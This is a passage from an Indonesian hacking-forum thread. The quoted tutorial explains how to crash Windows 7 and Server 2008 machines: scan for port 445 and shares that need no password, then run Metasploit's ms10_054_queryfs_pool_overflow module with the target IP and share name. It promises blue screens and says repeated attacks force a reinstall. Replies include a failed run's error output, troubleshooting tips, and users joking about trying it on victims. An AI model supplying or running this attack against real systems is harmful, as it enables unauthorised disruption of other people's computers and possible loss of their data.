DOS Windows 7 metode share folder
#31
kok ane coba kayak gini ya bro ..

Spoiler! :

msf auxiliary(ms10_054_queryfs_pool_overflow) > exploit

[-] Auxiliary failed: Rex:Tongueroto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_ACCESS_DENIED (Command=117 WordCount=0)
[-] Call stack:
[-] /opt/metasploit/apps/pro/msf3/lib/rex/proto/smb/client.rb:215:in `smb_recv_parse'
[-] /opt/metasploit/apps/pro/msf3/lib/rex/proto/smb/client.rb:1069:in `tree_connect'
[-] /opt/metasploit/apps/pro/msf3/lib/rex/proto/smb/simpleclient.rb:275:in `connect'
[-] /opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow.rb:107:in `run'
[*] Auxiliary module execution completed


error nya dimana ya? access denied padahal uda gak di kasi pasword targetnya
HACK THE PLANET

#32
(02-08-2013, 12:11 AM)jboxxpradhana Wrote: kok ane coba kayak gini ya bro ..

Spoiler! :

msf auxiliary(ms10_054_queryfs_pool_overflow) > exploit

[-] Auxiliary failed: Rex:Tongueroto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_ACCESS_DENIED (Command=117 WordCount=0)
[-] Call stack:
[-] /opt/metasploit/apps/pro/msf3/lib/rex/proto/smb/client.rb:215:in `smb_recv_parse'
[-] /opt/metasploit/apps/pro/msf3/lib/rex/proto/smb/client.rb:1069:in `tree_connect'
[-] /opt/metasploit/apps/pro/msf3/lib/rex/proto/smb/simpleclient.rb:275:in `connect'
[-] /opt/metasploit/apps/pro/msf3/modules/auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow.rb:107:in `run'
[*] Auxiliary module execution completed


error nya dimana ya? access denied padahal uda gak di kasi pasword targetnya

Coba di update dulu metasploitnya,,,, Big Grin
atau mungkin target bukan win 7.... Big Grin

#33
thanks for your tutor bro. joss !!Smile
./ Search it, learn it, try it !!


#34
wah keren nih,:-bd tapi mau coba belum ada korban.. hehe

#35
top om work 100% tqtq ,btw nice share om ehehhe
root@V1cky:~# /etc/init.d/mybrain restart

#36
sangat simple tapi sakti :v

=))

#37
asek perlu di cobain nih.........hihi nice

#38
Wkwkkwkk,,,,,, awas jangan suka isenggg :p

#39
mau dicoba tapi kasihan korbannya....http://indonesianbacktrack.or.id/forum/images/smilies/yahoo/20.gif

#40
(11-07-2012, 10:48 AM)xnod_die Wrote: Okayy mas brow ane balik lagi dengan tujuan yang sama,,,, lagi2 dengan Vulnnya windows 7 or Windows server 2008.....
Pada thread ini,,, lebih mudah membuat target yang kita serang menjadi blue screen,, lebih bahaya nya jika kita mengeksekusi lebih dari 20x serangan PC atau Laptop target pasti crash atau harus instal ulang....

Metode nya adalah dimana kita harus mencari kelemahan user pengguna yang mengaktifkan share document nya,,,, dan ada folder yang di share tanpa ada autentifikasi password....

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Target Win7 or server 2008
* port 445 (aktif)
* share folder (aktif)
note: caranya pasti masbrow dah paham betul,, cari IP mana yang memberikan akses shared document secara bebas...
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
langsung aja,,, Confused

msf > use auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow
msf > set RHOST [target IP]
msf > set SMBSHARE [nama folder yang di share target]
msf > exploit

simple kan,,, dijamin target akan langsung BLUE SCREEEN....

note: gak ada video nya yah,,, tapi di jamin 90% berhasil walaupun target yang kita serang itu ada Anti Virus (semacem ESET NOD32 dll..)


Regards

Xnod_die

Was Here....

mantaaaapppp Smile:-Smile:-






Users browsing this thread: 2 Guest(s)